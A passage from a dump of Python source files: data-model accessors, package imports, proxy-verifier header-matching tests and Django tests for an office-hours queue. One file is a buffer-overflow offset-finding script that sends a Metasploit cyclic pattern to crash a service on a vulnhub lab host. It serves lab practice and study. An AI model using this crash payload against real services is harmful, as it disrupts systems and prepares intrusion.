self._db_module_name = module_name
def db_delete_module_name(self, module_name):
self._db_module_name = None
def __get_db_completed(self):
return self._db_completed
def __set_db_completed(self, completed):
self._db_completed = completed
self.is_dirty = True
db_completed = property(__get_db_completed, __set_db_completed)
def db_add_completed(self, completed):
self._db_completed = completed
def db_change_completed(self, completed):
self._db_completed = completed
def db_delete_completed(self, completed):
self._db_completed = None
def __get_db_error(self):
return self._db_error
def __set_db_error(self, error):
self._db_error = error
self.is_dirty = True
db_error = property(__get_db_error, __set_db_error)
def db_add_error(self, error):
self._db_error = error
def db_change_error(self, error):
self._db_error = error
def db_delete_error(self, error):
self._db_error = None
def __get_db_abstraction_id(self):
return self._db_abstraction_id
def __set_db_abstraction_id(self, abstraction_id):
self._db_abstraction_id = abstraction_id
self.is_dirty = True
db_abstraction_id = property(__get_db_abstraction_id, __set_db_abstraction_id)
def db_add_abstraction_id(self, abstraction_id):
self._db_abstraction_id = abstraction_id
def db_change_abstraction_id(self, abstraction_id):
self._db_abstraction_id = abstraction_id
def db_delete_abstraction_id(self, abstraction_id):
self._db_abstraction_id = None
def __get_db_abstraction_version(self):
return self._db_abstraction_version
def __set_db_abstraction_version(self, abstraction_version):
self._db_abstraction_version = abstraction_version
self.is_dirty = True
db_abstraction_version = property(__get_db_abstraction_version, __set_db_abstraction_version)
def db_add_abstraction_version(self, abstraction_version):
self._db_abstraction_version = abstraction_version
def db_change_abstraction_version(self, abstraction_version):
self._db_abstraction_version = abstraction_version
def db_delete_abstraction_version(self, abstraction_version):
self._db_abstraction_version = None
def __get_db_machine_id(self):
return self._db_machine_id
def __set_db_machine_id(self, machine_id):
self._db_machine_id = machine_id
self.is_dirty = True
db_machine_id = property(__get_db_machine_id, __set_db_machine_id)
def db_add_machine_id(self, machine_id):
self._db_machine_id = machine_id
def db_change_machine_id(self, machine_id):
self._db_machine_id = machine_id
def db_delete_machine_id(self, machine_id):
self._db_machine_id = None
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def __get_db_loop_execs(self):
return self._db_loop_execs
def __set_db_loop_execs(self, loop_execs):
self._db_loop_execs = loop_execs
self.is_dirty = True
db_loop_execs = property(__get_db_loop_execs, __set_db_loop_execs)
def db_get_loop_execs(self):
return self._db_loop_execs
def db_add_loop_exec(self, loop_exec):
self.is_dirty = True
self._db_loop_execs.append(loop_exec)
self.db_loop_execs_id_index[loop_exec.db_id] = loop_exec
def db_change_loop_exec(self, loop_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_loop_execs)):
if self._db_loop_execs[i].db_id == loop_exec.db_id:
self._db_loop_execs[i] = loop_exec
found = True
break
if not found:
self._db_loop_execs.append(loop_exec)
self.db_loop_execs_id_index[loop_exec.db_id] = loop_exec
def db_delete_loop_exec(self, loop_exec):
self.is_dirty = True
for i in xrange(len(self._db_loop_execs)):
if self._db_loop_execs[i].db_id == loop_exec.db_id:
if not self._db_loop_execs[i].is_new:
self.db_deleted_loop_execs.append(self._db_loop_execs[i])
del self._db_loop_execs[i]
break
del self.db_loop_execs_id_index[loop_exec.db_id]
def db_get_loop_exec(self, key):
for i in xrange(len(self._db_loop_execs)):
if self._db_loop_execs[i].db_id == key:
return self._db_loop_execs[i]
return None
def db_get_loop_exec_by_id(self, key):
return self.db_loop_execs_id_index[key]
def db_has_loop_exec_with_id(self, key):
return key in self.db_loop_execs_id_index
def getPrimaryKey(self):
return self._db_id
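# Traversal sketch (editorial addition): db_children flattens an object and its
# keyed children into (object, parent_type, parent_id) tuples; with orphan=True
# the children are also detached from the parent. Deleted children are drained
# separately via db_deleted_children(remove=True).
#
#   triples = module_exec.db_children()            # includes module_exec itself
#   removed = module_exec.db_deleted_children(remove=True)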
1cf75a88a0bcd70164681cc3e84bf9d71b740ceb | 48 | py | Python | allopy/optimize/portfolio/active/__init__.py | wangcj05/allopy | 0d97127e5132df1449283198143994b45fb11214 | ["MIT"] | stars: 1 (2021-04-06T04:33:03.000Z) | issues: null | forks: null
from .optimizer import ActivePortfolioOptimizer
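# Re-export: callers can import ActivePortfolioOptimizer directly from
# allopy.optimize.portfolio.active instead of reaching into the .optimizer
# submodule.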
1c044ae557848842c8cb04a31d461064ac43b620 | 2,176 | py | Python | 02_findingtheOffset.py | F-Masood/bufferoverflow | b287c5033ed79158f183bb8ba7f964efeccbfe59 | ["MIT"] | stars: null | issues: null | forks: null
#!/usr/bin/python
import sys,socket
# msf-pattern_create -l 1850  [vulnhub netstart by foxlox]
ip = '192.168.10.51'
port = 2371
offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(offset)  # send the cyclic pattern as the crashing payload
    s.close()
except socket.error:
    print("Error connecting to server")
    sys.exit(1)
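# Follow-up sketch (editorial addition): once the service crashes under a
# debugger, the bytes that land in EIP identify the offset within the cyclic
# pattern; the EIP value below is a placeholder, not an observed result.
#   msf-pattern_offset -l 1850 -q <EIP value from the debugger>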
1c1375c53bef4c1b457d615f57061a389efe4123 | 10,123 | py | Python | test/autests/gold_tests/field_verification/not_nocase.test.py | keesspoelstra/proxy-verifier | 1b219d68783a453c2271108bbea5a9529d018498 | ["Apache-2.0"] | stars: 31 (2020-03-03T04:37:36.000Z to 2022-03-31T15:43:07.000Z) | issues: 33 (2020-02-11T19:34:12.000Z to 2021-06-21T20:07:32.000Z) | forks: 13 (2020-02-07T20:04:02.000Z to 2021-12-21T21:26:40.000Z)
'''
Verify correct field and URL verification behavior
for not and nocase modifiers.
'''
# @file
#
# Copyright 2021, Verizon Media
# SPDX-License-Identifier: Apache-2.0
#
Test.Summary = '''
Verify correct field and URL verification behavior for
equals, absent, present, contains, prefix, and suffix
with not, nocase, and both not and nocase modifiers
'''
#
# Test 1: Verify field verification in a YAML replay file.
# Each combination of test type, with/without "not", case/nocase, and
# positive/negative result is tested for the client, and a mixture for the
# server.
#
r = Test.AddTestRun("Verify 'not' and 'nocase' directives work for a single HTTP transaction")
client = r.AddClientProcess("client1", "replay_files/not_nocase.yaml")
server = r.AddServerProcess("server1", "replay_files/not_nocase.yaml")
proxy = r.AddProxyProcess(
"proxy1",
listen_port=client.Variables.http_port,
server_port=server.Variables.http_port)
server.Streams.stdout += Testers.ContainsExpression(
'Not Equals Success: Different. Key: "5", Field Name: "host", Correct Value: "le.on", Actual Value: "example.one"',
'Validation should be happy that "le.on" is not equal to "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not Presence Success: Absent. Key: "5", Field Name: "x-test-absent"',
'Validation should be happy that "X-Test-Absent" has no value.')
server.Streams.stdout += Testers.ContainsExpression(
'Not Absence Success: Present. Key: "5", Field Name: "x-test-present", Value: "It\'s there"',
'Validation should be happy that "X-Test-Present" has a value.')
server.Streams.stdout += Testers.ContainsExpression(
'Not Contains Success: Not Found. Key: "5", Field Name: "host", Required Value: "leo", Actual Value: "example.one"',
'Validation should be happy that "leo" is not contained in "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not Prefix Success: Not Found. Key: "5", Field Name: "x-test-request", Required Value: "equ", Actual Value: "RequestData"',
'Validation should be happy that "equ" does not prefix "RequestData".')
server.Streams.stdout += Testers.ContainsExpression(
'Not Suffix Success: Not Found. Key: "5", Field Name: "x-test-present", Required Value: "It\'s", Actual Value: "It\'s there"',
'Validation should be happy that "It\'s" does not suffix "It\'s there".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Equals Success: Key: "5", Field Name: "host", Required Value: "EXAMpLE.ONE", Value: "example.one"',
'Validation should be happy that "EXAMpLE.ONE" nocase equals "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Contains Success: Key: "5", Field Name: "host", Required Value: "Le.ON", Value: "example.one"',
'Validation should be happy that "Le.ON" is nocase contained in "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Prefix Success: Key: "5", Field Name: "x-test-request", Required Value: "rEQ", Value: "RequestData"',
'Validation should be happy that "rEQ" nocase prefixes "RequestData".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Suffix Success: Key: "5", Field Name: "x-test-present", Required Value: "heRe", Value: "It\'s there"',
'Validation should be happy that "heRe" nocase suffixes "It\'s there".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Equals Success: Different. Key: "5", Field Name: "host", Correct Value: "example.ON", Actual Value: "example.one"',
    'Validation should be happy that "example.ON" does not nocase equal "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Contains Success: Not Found. Key: "5", Field Name: "host", Required Value: "U", Actual Value: "example.one"',
    'Validation should be happy that "U" is not nocase contained in "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Prefix Success: Not Found. Key: "5", Field Name: "x-test-request", Required Value: "EQU", Actual Value: "RequestData"',
'Validation should be happy that "equ" does not nocase prefix "RequestData".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Suffix Success: Not Found. Key: "5", Field Name: "x-test-present", Required Value: "hre", Actual Value: "It\'s there"',
'Validation should be happy that "hre" does not nocase suffix "It\'s there".')
server.Streams.stdout += Testers.ContainsExpression(
'Not Equals Violation: Key: "5", Field Name: "host", Value: "example.one"',
    'Validation should complain that "example.one" equals "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not Presence Violation: Key: "5", Field Name: "x-test-present", Value: "It\'s there"',
'Validation should complain that "X-Test-Present" has a value.')
server.Streams.stdout += Testers.ContainsExpression(
'Not Absence Violation: Key: "5", Field Name: "x-test-absent"',
'Validation should complain that "X-Test-Absent" has no value.')
server.Streams.stdout += Testers.ContainsExpression(
'Not Contains Violation: Key: "5", Field Name: "host", Required Value: "le.on", Value: "example.one"',
'Validation should complain that "le.on" is contained in "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not Prefix Violation: Key: "5", Field Name: "x-test-request", Required Value: "Req", Value: "RequestData"',
'Validation should complain that "Req" prefixes "RequestData".')
server.Streams.stdout += Testers.ContainsExpression(
'Not Suffix Violation: Key: "5", Field Name: "x-test-present", Required Value: "there", Value: "It\'s there"',
'Validation should complain that "there" suffixes "It\'s there".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Equals Violation: Different. Key: "5", Field Name: "host", Correct Value: "EXAMPLE.ON", Actual Value: "example.one"',
    'Validation should complain that "EXAMPLE.ON" does not nocase equal "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Contains Violation: Not Found. Key: "5", Field Name: "host", Required Value: "LE..On", Actual Value: "example.one"',
'Validation should complain that "LE..On" is not nocase contained in "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Prefix Violation: Not Found. Key: "5", Field Name: "x-test-request", Required Value: "-TE", Actual Value: "RequestData"',
'Validation should complain that "-TE" does not nocase prefix "RequestData".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Suffix Violation: Not Found. Key: "5", Field Name: "x-test-present", Required Value: "THER", Actual Value: "It\'s there"',
'Validation should complain that "THER" does not nocase suffix "It\'s there".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Equals Violation: Key: "5", Field Name: "host", Required Value: "Example.one", Value: "example.one"',
'Validation should complain that "Example.one" nocase equals "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Contains Violation: Key: "5", Field Name: "host", Required Value: "le.oN", Value: "example.one"',
'Validation should complain that "le.oN" is nocase contained in "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Prefix Violation: Key: "5", Field Name: "x-test-request", Required Value: "req", Value: "RequestData"',
'Validation should complain that "req" nocase prefixes "RequestData".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Suffix Violation: Key: "5", Field Name: "x-test-present", Required Value: "eRE", Value: "It\'s there"',
'Validation should complain that "eRE" nocase suffixes "It\'s there".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Contains Violation: Key: "5", URI Part: "path", Required Value: "iG/S", Value: "/config/settings.yaml"',
'Validation should complain that "iG/S" is nocase contained in the path.')
client.Streams.stdout += Testers.ContainsExpression(
'Not Equals Success: Different. Key: "5", Field Name: "content-type", Correct Value: "text", Actual Value: "text/html"',
'Validation should be happy that "text" does not equal "text/html".')
client.Streams.stdout += Testers.ContainsExpression(
'Not Presence Violation: Key: "5", Field Name: "set-cookie", Value: "ABCD"',
'Validation should complain that "set-cookie" is present.')
client.Streams.stdout += Testers.ContainsExpression(
'Not Absence Violation: Key: "5", Field Name: "fake-cookie"',
'Validation should complain that "fake-cookie" is absent.')
client.Streams.stdout += Testers.ContainsExpression(
'Not No Case Contains Violation: Key: "5", Field Name: "content-type", Required Value: "Tex", Value: "text/html"',
'Validation should complain that "Tex" is nocase contained in "text/html".')
client.Streams.stdout += Testers.ContainsExpression(
'Not No Case Prefix Success: Absent. Key: "5", Field Name: "fake-cookie", Required Value: "B"',
'Validation should be happy that "B" does not nocase prefix a nonexistent header.')
client.Streams.stdout += Testers.ContainsExpression(
'No Case Suffix Success: Key: "5", Field Name: "content-type", Required Value: "L", Value: "text/html"',
'Validation should be happy that "L" nocase suffixes "text/html".')
client.Streams.stdout += Testers.ContainsExpression(
'Not Prefix Success: Not Found. Key: "5", Field Name: "multiple", Required Values: "Abc" "DEF", Received Values: "abc" "DEF"',
'Validation should be happy that "Abc" does not prefix "abc", even though "DEF" prefixes "DEF".')
client.Streams.stdout += Testers.ContainsExpression(
'Not No Case Equals Violation: Key: "5", Field Name: "multiple", Required Values: "Abc" "DEF", Values: "abc" "DEF"',
'Validation should complain that each required value nocase equals the corresponding received value.')
client.ReturnCode = 1
server.ReturnCode = 1
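# Editorial note: both expected return codes are 1, presumably because the
# replay file intentionally triggers the "Violation" cases asserted above, so
# the verifier exits non-zero on each side.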
1c4aa9eedb3b1c6e2e7a3e567eb7ad686eaa3237 | 95 | py | Python | src/learndash/api_resources/__init__.py | MarkMacDon/learndash-python | a3fbfc45567a524b80c732d735f2ae101119f2e4 | ["MIT"] | stars: null | issues: 1 (2021-05-06T19:01:24.000Z) | forks: 2 (2021-05-05T22:45:04.000Z to 2021-07-24T08:47:02.000Z)
from learndash.api_resources.course import Course
from learndash.api_resources.user import User
1c8bd63bbcf9973362a7a60fdb41739b53e0c42c | 119 | py | Python | light_bulb/__init__.py | renorram/opengl_lamp | fe43ebfaea688f19cc05fe791fe9f15d7b283a7b | ["MIT"] | stars: null | issues: null | forks: null
from light_bulb.camera import Camera
from light_bulb.controls import Controls
from light_bulb.lighting import Lighting
1c90dc783a4f274931b624f5ef23dfb91babaf94 | 28,170 | py | Python | ohqueue/tests.py | mike2151/Online-OH-queue | 04544a55bf57b5d93e0fcf2764e6ee6511d6c2ed | ["MIT"] | stars: 6 (2019-05-17T02:29:12.000Z to 2020-09-28T01:14:47.000Z) | issues: 33 (2018-12-16T18:58:11.000Z to 2021-06-10T21:04:11.000Z) | forks: 3 (2019-01-10T15:55:18.000Z to 2021-02-25T15:54:36.000Z)
from django.test import TestCase
from .models import OHQueue
from freezegun import freeze_time
from users.models import StudentUser
import datetime
from rest_framework.test import APIClient
from rest_framework.authtoken.models import Token
import json
import string, random
class OHCreation(TestCase):
def setUp(self):
self.queue = OHQueue.objects.create(name="main", monday_times="4:00pm-6:00pm")
self.student_user = StudentUser.objects.create(username="test", email="test@upenn.edu", first_name="tester",
last_name="smith", password="testing123")
self.student_user.set_password("testing123")
self.student_user.is_active = True
self.student_user.save()
@freeze_time("2018-12-31 21:00:01")
def test_ohqueue_created(self):
self.assertEquals("main", self.queue.name)
self.assertEquals("4:00pm-6:00pm", self.queue.monday_times)
self.assertTrue(self.queue.isQueueActive(self.student_user))
@freeze_time("2018-12-31 16:00:01")
def test_is_queue_inactive(self):
self.assertFalse(self.queue.isQueueActive(self.student_user))
@freeze_time("2018-12-31 21:00:01")
def test_update_time(self):
self.assertTrue(self.queue.isQueueActive(self.student_user))
freezer = freeze_time("2018-12-31 16:00:01")
freezer.start()
self.queue.updateTime()
self.assertFalse(self.queue.is_in_time)
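    # freeze_time sketch (editorial addition): freezegun also works as a
    # context manager, which avoids leaking a started freezer across tests:
    #
    #   with freeze_time("2018-12-31 16:00:01"):
    #       self.queue.updateTime()
    #       self.assertFalse(self.queue.is_in_time)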
# These tests assume New York Time zone!
class OHQuestions(TestCase):
def setUp(self):
self.client = APIClient()
self.queue = OHQueue.objects.create(name="main", monday_times="4:00pm-6:00pm")
# monday time at queue opening time
freezer = freeze_time("2018-12-31 21:00:01")
freezer.start()
self.student_user = StudentUser.objects.create(username="test", email="test@upenn.edu", first_name="tester",
last_name="smith", password="testing123")
self.student_user.set_password("testing123")
self.student_user.is_active = True
self.student_user.save()
self.student_user_two = StudentUser.objects.create(username="test2", email="test2@upenn.edu", first_name="tester2",
last_name="smith", password="testing123")
self.student_user_two.set_password("testing123")
self.student_user_two.is_active = True
self.student_user_two.save()
self.ta_user = StudentUser.objects.create(username="ta", email="ta@upenn.edu", first_name="ta",
last_name="smith", password="testing123")
self.ta_user.set_password("testing123")
self.ta_user.is_active = True
self.ta_user.is_ta = True
self.ta_user.save()
def generate_header(self, user):
token, _ = Token.objects.get_or_create(user=user)
self.client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
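    # Note: after generate_header(), every request made through self.client
    # carries an "Authorization: Token <key>" header for the given user
    # (DRF TokenAuthentication).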
def test_queue_is_open(self):
self.generate_header(self.student_user)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(200, response.status_code)
self.assertEquals(1, len(json.loads(response.content)))
def test_is_queue_open_unauthenticated(self):
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(401, response.status_code)
def test_queue_is_closed(self):
freezer = freeze_time("2018-12-31 16:00:01")
freezer.start()
self.generate_header(self.student_user)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(200, response.status_code)
self.assertEquals(0, len(json.loads(response.content)))
# ta_list end point
def test_queue_is_open_ta(self):
self.generate_header(self.ta_user)
response = self.client.get('/api/v1/queue/list_ta/')
self.assertEquals(200, response.status_code)
self.assertEquals(1, len(json.loads(response.content)))
def test_is_queue_open_unauthenticated_ta(self):
response = self.client.get('/api/v1/queue/list_ta/')
self.assertEquals(401, response.status_code)
    def test_is_queue_open_student_ta(self):
        # A plain student must not reach the TA-only listing; this assumes
        # DRF's default 403 Forbidden for an authenticated user who fails the
        # permission check.
        self.generate_header(self.student_user)
        response = self.client.get('/api/v1/queue/list_ta/')
        self.assertEquals(403, response.status_code)
def test_queue_is_not_closed_ta(self):
freezer = freeze_time("2018-12-31 16:00:01")
freezer.start()
self.generate_header(self.ta_user)
response = self.client.get('/api/v1/queue/list_ta/')
self.assertEquals(200, response.status_code)
self.assertEquals(1, len(json.loads(response.content)))
# extend open tests
def test_can_extend_ohqueue(self):
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/queue/open/', {"queue": "main"}, format="json")
self.assertTrue(json.loads(response.content)["success"])
def test_student_cannot_extend_ohqueue(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/open/', {"queue": "main"}, format="json")
self.assertFalse(json.loads(response.content)["success"])
def test_unauthenticated_cannot_extend_ohqueue(self):
response = self.client.post('/api/v1/queue/open/', {"queue": "main"}, format="json")
self.assertFalse(json.loads(response.content)["success"])
def test_closed_then_extended_open(self):
freezer = freeze_time("2018-12-31 16:00:01")
freezer.start()
self.generate_header(self.student_user)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(0, len(json.loads(response.content)))
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/queue/open/', {"queue": "main"}, format="json")
self.assertTrue(json.loads(response.content)["success"])
self.generate_header(self.student_user)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(1, len(json.loads(response.content)))
# close early tests
def test_can_close_ohqueue(self):
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/queue/close/', {"queue": "main"}, format="json")
self.assertTrue(json.loads(response.content)["success"])
def test_student_cannot_close_ohqueue(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/close/', {"queue": "main"}, format="json")
self.assertFalse(json.loads(response.content)["success"])
def test_unauthenticated_cannot_close_ohqueue(self):
response = self.client.post('/api/v1/queue/close/', {"queue": "main"}, format="json")
self.assertFalse(json.loads(response.content)["success"])
def test_open_then_closed(self):
self.generate_header(self.student_user)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(1, len(json.loads(response.content)))
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/queue/close/', {"queue": "main"}, format="json")
self.assertTrue(json.loads(response.content)["success"])
self.generate_header(self.student_user)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(0, len(json.loads(response.content)))
# ask questions
def test_anon_cant_ask_question(self):
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertIn("Authentication credentials were not provided.", json.loads(response.content)["detail"])
def test_can_ask_question(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(201, response.status_code)
self.assertEquals(1, len(self.queue.questions.values()))
def test_queue_is_open_if_student_still_has_question(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/queue/close/', {"queue": "main"}, format="json")
self.generate_header(self.student_user)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(1, len(json.loads(response.content)))
self.generate_header(self.student_user_two)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(0, len(json.loads(response.content)))
def test_student_cannot_ask_two_questions(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(201, response.status_code)
self.assertEquals(1, len(self.queue.questions.values()))
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question 2"}, format="json")
self.assertEquals(400, response.status_code)
self.assertEquals(1, len(self.queue.questions.values()))
def test_student_cannot_ask_two_questions_in_different_queues(self):
queue_two = OHQueue.objects.create(name="second", monday_times="4:00pm-6:00pm")
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(201, response.status_code)
self.assertEquals(1, len(self.queue.questions.values()) + len(queue_two.questions.values()))
response = self.client.post('/api/v1/queue/second/ask/', {"description": "my question 2"}, format="json")
self.assertEquals(400, response.status_code)
self.assertEquals(1, len(self.queue.questions.values()) + len(queue_two.questions.values()))
def test_two_students_can_ask_two_questions_same_queue(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(201, response.status_code)
self.assertEquals(1, len(self.queue.questions.values()))
self.generate_header(self.student_user_two)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question 2"}, format="json")
self.assertEquals(201, response.status_code)
self.assertEquals(2, len(self.queue.questions.values()))
self.assertEquals("my question", self.queue.questions.values()[0]["description"])
self.assertEquals("my question 2", self.queue.questions.values()[1]["description"])
def test_two_students_can_ask_two_questions_different_queue(self):
queue_two = OHQueue.objects.create(name="second", monday_times="4:00pm-6:00pm")
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(201, response.status_code)
self.assertEquals(1, len(self.queue.questions.values()))
self.generate_header(self.student_user_two)
response = self.client.post('/api/v1/queue/second/ask/', {"description": "my question 2"}, format="json")
self.assertEquals(201, response.status_code)
self.assertEquals(1, len(queue_two.questions.values()))
self.assertEquals("my question", self.queue.questions.values()[0]["description"])
self.assertEquals("my question 2", queue_two.questions.values()[0]["description"])
# answering questions
def test_ta_can_answer_questions(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
question_id_one = (self.queue.questions.values()[0]["id"])
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/questions/answer/',
{"queue": "main", "question_id": question_id_one}, format="json")
self.assertEquals(200, response.status_code)
self.assertTrue(json.loads(response.content)["success"])
self.assertEquals(0, len(self.queue.questions.values()))
def test_anon_cannot_answer_questions(self):
